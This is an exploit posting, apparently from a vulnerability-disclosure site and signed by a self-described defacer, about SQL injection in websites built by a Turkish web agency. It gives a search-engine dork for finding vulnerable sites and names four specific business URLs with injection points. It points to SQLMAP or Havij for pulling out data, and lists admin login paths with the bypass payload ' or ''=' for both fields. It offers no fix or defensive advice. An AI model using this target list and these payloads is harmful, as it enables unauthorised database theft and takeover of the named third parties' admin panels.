2X Ajans SQL Injection Vulnerability

2021.03.08
az Thor (AZ) az
Risk: Medium
Local: No
Remote: Yes

''' # Exploit Title: 2X Ajans SQL Injection Vulnerability # Date: 08-03-2021 # Exploit Author: Defacer - Thor # Vendor Homepage:/No # Software Download Link:/No # Software: Web 2X Ajans # Google Dork Search: "Designed by 2X Ajans" "inurl:/"Designed by 2X Ajans" "intext:/"Designed by 2X Ajans" # EXAMPLE: https://www.anturkmakina.com.tr/haber.php?idd=2 ' http://www.ozkaratekstil.com.tr/urunler.php?id=10 ' http://www.plastas.com.tr/urunler.php?id=19 ' http://adabroker.com.tr/urunler.php?id=8 Thor Says: even makes a mistake when you put a nail mark ( Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/anturkmakinacom/public_html/haber.php on line 4) Warning: - Leak with HTTPS manual mode, HTTP leak with Havij or SQLMAP # Tested OS: Windows 8.1 / Mozilla Firefox and Google Chrome.. # Admin Page: /yonetim.php / admin/login.php # Panel ByPass: Login - ' or ''=' Pass - ' or ''=' Thanks to everyone

References:

Leak with HTTPS manual mode, HTTP leak with Havij or SQLMAP


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top